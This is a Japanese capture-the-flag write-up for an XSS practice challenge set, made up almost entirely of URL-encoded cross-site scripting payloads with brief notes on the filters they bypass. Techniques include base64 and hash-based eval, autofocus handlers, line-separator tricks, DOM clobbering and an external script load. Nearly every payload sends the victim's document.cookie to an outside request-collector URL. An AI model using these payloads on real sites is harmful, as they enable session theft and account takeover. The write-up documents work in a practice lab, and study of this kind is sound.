katagaitaiCTF勉強会 xss千本ノック writeup

楽しかったです

全部解けるようがんばります…がんばりたい…

2

やるだけ

q=%22%3E%3Cscript%3Elocation.href=%22https://requestb.in/x0u1ovx0?f3=%22%20%2B%20document.cookie%3C/script%3E

3

やるだけ

q=%22%3E%3Cscript%3Elocation.href=%22https://requestb.in/x0u1ovx0?f3=%22%20%2B%20document.cookie%3C/script%3E

4

textareaを閉じる

q=</textarea><script>location.href='https://requestb.in/x0u1ovx0?f3='%20%2B%20document.cookie</script>

5

autofocus

q=%22%20 autofocus onfocus=%22location.href=%27https://requestb.in/x0u1ovx0?f5_=%27%20%2B%20document.cookie

6

%27で閉じる

q=!%22%27%20 autofocus onfocus=location.href='https://requestb.in/x0u1ovx0?f6='%2Bdocument.cookie;//

7

autofocus q=1%20autofocus%20onfocus=location.href=%27https://requestb.in/x0u1ovx0?f7=%27%2Bdocument.cookie;//

8

iframeのsrcをjavascript:

q=javascript:location.href=%22https://requestb.in/x0u1ovx0?f8=%22%20%2B%20document.cookie

9

scriptタグ

q=%3Cscript%3Elocation.href=%22https://requestb.in/x0u1ovx0?f9=%22%20%2B%20document.cookie%3C/script%3E

10

scriptが消えるのでいっぱいscriptを書く

q=%3Cscrscriptiscriptpscriptt%3Elocation.href=%22https://requestb.in/x0u1ovx0?f10=%22%20%2B%20document.cookie%3C/scrscriptiscriptpscriptt%3E

11,12

scriptが消えるのでonloadに挟む

q=%3Csvg%20oscriptnload=location.href=%27https://requestb.in/x0u1ovx0?f11=%27%2Bdocument.cookie%20%27%20%3E

13

alert()を閉じる

q=%27);location.href=%22https://requestb.in/x0u1ovx0?%22%2Bdocument.cookie;//

14

外部スクリプトを作って読む

q=%3Cscript%20src=http://aviavi.ga/ajs%3E%3C/script%3E

15

大文字の外部スクリプトを作って読む HTTP://ドメインの部分は大文字小文字関係なく繋がる

q=%3Cscript%20src=http://aviavi.ga/AJS%3E%3C/script%3E

16

.が使えないのでbase64でevalする

q=%3Cscript%3Eeval(atob('bG9jYXRpb24uaHJlZj0iaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9mMz0iICsgZG9jdW1lbnQuY29va2ll'))%3C/script%3E

17

‘が使えないのでバッククォートを使う

q=%3Cscript%3Eeval(atob(`bG9jYXRpb24uaHJlZj0iaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9mMz0iICsgZG9jdW1lbnQuY29va2ll`))%3C/script%3E

18,19

scriptタグにbase64を使う

q=%3C/script%3E%3Cscript%20src=%27data:text/html;base64,bG9jYXRpb24uaHJlZj0iaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9mMz0iK2RvY3VtZW50LmNvb2tpZQ==%27%3E%3C/script%3E

20

scriptタグでhashをevalする

q=%3Csvg%20onload=eval(URL.slice(105))%3E#location["href"]="https://requestb.in/x0u1ovx0?f3="+document.cookie

21

svg onloadでhashをeval .が使えないのでlocation[“href”]にする

q=%22%3E%3Cimg%3E//onload=eval(URL.slice(127));%20//a%20//src=/#location["href"]="https://requestb.in/x0u1ovx0?f3="+document.cookie

22,23

hashをeval

q=%3Csvg%20//%20onload=eval(URL.slice(112))%3E//#location.href="https://requestb.in/x0u1ovx0?f3="+document.cookie

24

documentがnullなのでwindowを使う q=location.href=%22https://requestb.in/x0u1ovx0?f3=%22%2Bwindow.document.cookie

25~28

windowもnullなのでthisとかtopを使う

q=location.href=%22https://requestb.in/x0u1ovx0?f3=%22%2Bthis.document.cookie

q=location.href=%22https://requestb.in/x0u1ovx0?f3=%22%2Btop.document.cookie

29

imgタグを閉じずに読ませる q=aa%3C/p%3E%3Cp%3E%3Cimg%20%3Cimg%20%20%20src=%22https://requestb.in/x0u1ovx0?

30

クォートと.が使えないのでhashの文字列を連結させてがんばる

q=location[`href`]=location[`hash`][1]%2Blocation[`hash`][2]%2Blocation[`hash`][3]%2Blocation[`hash`][4]%2Blocation[`hash`][5]%2Blocation[`hash`][6]%2Blocation[`hash`][7]%2Blocation[`hash`][8]%2Blocation[`hash`][9]%2Blocation[`hash`][10]%2Blocation[`hash`][11]%2Blocation[`hash`][12]%2Blocation[`hash`][13]%2Blocation[`hash`][14]%2Blocation[`hash`][15]%2Blocation[`hash`][16]%2Blocation[`hash`][17]%2Blocation[`hash`][18]%2Blocation[`hash`][19]%2Blocation[`hash`][20]%2Blocation[`hash`][21]%2Blocation[`hash`][22]%2Blocation[`hash`][23]%2Blocation[`hash`][24]%2Blocation[`hash`][25]%2Blocation[`hash`][26]%2Blocation[`hash`][27]%2Blocation[`hash`][28]%2B`?`%2Bdocument[`cookie`]#https://requestb.in/x0u1ovx0

31

document.write()を閉じる

q=%27);location.href=%27https://requestb.in/x0u1ovx0?%27%2Bdocument.cookie;//

32

一つ目のパラメータでエスケープで閉じさせなくする

q1=\&q2=,location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie//

33

blink()でblinkタグを作りsvgを入れる

q=%22%3Csvg%20onload=location.href=%27https://requestb.in/x0u1ovx0?%27%2Bdocument.cookie;%3E%22.blink()

34

typeを上書きしてhiddenさせなくする

q=%22%20onfocus=location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie%20type=text%20autofocus%20a

35

改行コード %0a q=%0Alocation.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie

36

改行コード %0A%0D q=%0A%0Dlocation.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie

37

改行コード %0A%0D%E2%80%A8 q=%0A%0D%E2%80%A8location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie

38

改行コード %0A%0D%E2%80%A8%E2%E2%80%A8%80%A8

q=%0A%0D%E2%80%A8%E2%E2%80%A8%80%A8location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie

39

%E2%80%A8が消されるのでいっぱい突っ込む

q=%0A%0D%E2%80%A8%E2%E2%80%A8%80%A8location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie

40

バッククォートでauditor回避

q1=%3Cscript%3E`&q2=a`;location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie;%3C/script%3E`

41

ハッシュをeval

q=%3Cscript%3Eeval(eval(location.href.substr(-92)))%3C/script#atob("bG9jYXRpb24uaHJlZj1gaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9gK2RvY3VtZW50LmNvb2tpZTs=")

42,43

base64をeval

q=%3Csvg%20onload=eval(atob(`bG9jYXRpb24uaHJlZj1gaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9gK2RvY3VtZW50LmNvb2tpZTs=`))%3E

44

全部エスケープされてて無理じゃんってなった

& => &
' => '
" => "
> => >
< => &lt;
!$%[@:][{}*`+}()~=`$

phpの問題だった

formのurlに$_SERVER[‘PHP_SELF’]を使っている

それとdom clobberingでdocument.bodyを書き換える

~~.knock.xss.moe//index.php/%22%20name=body%20%3E%3Cinput%20value=%22?q=%3Csvg%20onload=eval(atob(`bG9jYXRpb24uaHJlZj1gaHR0cHM6Ly9yZXF1ZXN0Yi5pbi9waHdxNWRwaD9gK2RvY3VtZW50LmNvb2tpZTs=`))%3E

45

ダメ